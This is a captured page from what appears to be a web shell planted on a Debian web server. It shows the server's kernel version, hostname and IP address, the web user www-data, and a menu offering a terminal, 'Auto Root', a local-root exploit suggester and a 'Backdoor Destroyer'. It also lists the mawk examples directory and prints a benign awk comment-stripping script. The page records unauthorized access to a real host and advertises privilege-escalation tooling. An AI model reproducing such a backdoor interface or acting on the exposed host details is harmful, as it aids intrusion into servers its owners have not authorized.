Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
mawk /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
ct_length.awk
407
B
-rwxr-xr-x
2012-03-23 21:15
decl.awk
2.97
KB
-rw-r--r--
2012-03-23 21:15
deps.awk
1.28
KB
-rw-r--r--
2012-03-23 21:15
eatc.awk
492
B
-rw-r--r--
2012-03-23 21:15
gdecl.awk
2.72
KB
-rw-r--r--
2012-03-23 21:15
hcal.gz
4.92
KB
-rw-r--r--
2012-03-23 21:15
hical
3.12
KB
-rwxr-xr-x
2012-03-23 21:15
nocomment.awk
590
B
-rw-r--r--
2012-03-23 21:15
primes.awk
1.03
KB
-rw-r--r--
2012-03-23 21:15
qsort.awk
1.07
KB
-rw-r--r--
2012-03-23 21:15
Save
Rename
#!/usr/bin/mawk -f # eatc.awk # another program to remove comments # { while( t = index($0 , "/*") ) { printf "%s" , substr($0,1,t-1) $0 = eat_comment( substr($0, t+2) ) } print } function eat_comment(s, t) { #replace comment by one space printf " " while ( (t = index(s, "*/")) == 0 ) if ( getline s == 0 ) { # input error -- unterminated comment system("/bin/sh -c 'echo unterminated comment' 1>&2") exit 1 } return substr(s,t+2) }